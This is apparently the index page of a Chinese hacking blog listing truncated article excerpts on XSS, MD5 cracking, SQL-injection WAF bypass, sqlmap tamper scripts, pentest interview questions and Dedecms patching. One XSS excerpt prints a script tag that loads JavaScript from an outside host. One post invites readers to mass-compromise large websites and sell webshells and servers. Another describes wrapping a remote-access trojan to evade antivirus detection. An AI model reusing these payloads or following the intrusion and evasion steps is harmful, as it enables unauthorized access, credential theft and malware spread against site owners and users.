hkjs

分享最前沿的技术文章

hkjs

XSS从入门到放弃

阅读(4480)评论(0)

前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1    什么是XSS漏洞:      XSS又叫CSS (Cross Site Script) ,跨站...

hkjs

20位丶30位MD5解密方法

阅读(2019)评论(0)

20位MD5解密: 去掉前三位,后一位,丢到MD5解密网站即可(20位MD5一般出现在织梦) 今天挖漏洞,碰到了个30位的MD5,asp.net环境 30位加密: 一种就是CFS编码 30位的 一种就是生成完整的 32位 MD5 密码,...

hkjs

【科普】77种Xss跨站姿势

阅读(2294)评论(0)

(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>    (2)IMG标签XSS使用JavaScript命令  <SCRIPT SRC=http://3w.org/XSS/xss.js&g...

hkjs

一套实用的渗透测试岗位面试题,你会吗?

阅读(1941)评论(1)

1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说... 2.mysql的网站注入,5.0以上和5.0以下有什么区别? 5.0以下没...

hkjs

织梦Dedecms漏洞修复大全

阅读(2114)评论(0)

织梦系统用户很多,被发现的漏洞也就相对很多,所以网站安全需要做好,很多所谓的“黑客”都是用工具来扫描入侵,厉害点的人是不屑来黑我们的小网站的,所以在我们不是专业维护人员情况下,做好一般的安全防护就可以了。 多关注dedecms官方发布的安全补丁 以下是收集整理的内容: ...

hkjs

SQL 淫荡绕过WAF技巧

阅读(2234)评论(0)

前言: 看到许多大牛WAF绕过技巧,小弟来补充一下  0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如...

hkjs

看我是如何利用补天批量入侵各种大型网站#提权各种服务器

阅读(2813)评论(0)

好久没发文章了,今天来一篇,大牛勿喷,小弟很菜的。 上次提交一枚漏洞:<<看我是如何利用补天批量入侵各种大型网站#提权各种服务器>> 官方说危害不大,那我就发出来了,出事不要怪我。 大家可以利用补天拿各种webshell,提权,卖服务器,卖shell,当肉鸡都可以。 ...

hkjs

使用sqlmap中tamper脚本绕过waf

阅读(1912)评论(0)

0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸...

hkjs

查看浏览器保存的密码[必备技能]

阅读(1920)评论(0)

很多浏览器有记住密码这个功能,其实这样很不安全。 以Chrome内核的浏览器为例。 右键审查元素,或者用快捷键F12都可以调出。 找到type="password"的Input标签。 双击type="password",该属性就成编辑状态。 将type='password'改为type='te...

hkjs

易语言封装木马过免杀教程

阅读(2311)评论(0)

首先正常生成一个远程木马 肯定会爆毒 我们打开易语言 新建窗口进行封装(以前我都是这样搞个小工具箱。) 然后导入图片组 双击标题进入 程序代码编辑 写到文件 (“c:\windows\system32\ceshi.exe”, #图片1) ...



Powered by 小陈 © Boon theme By 小陈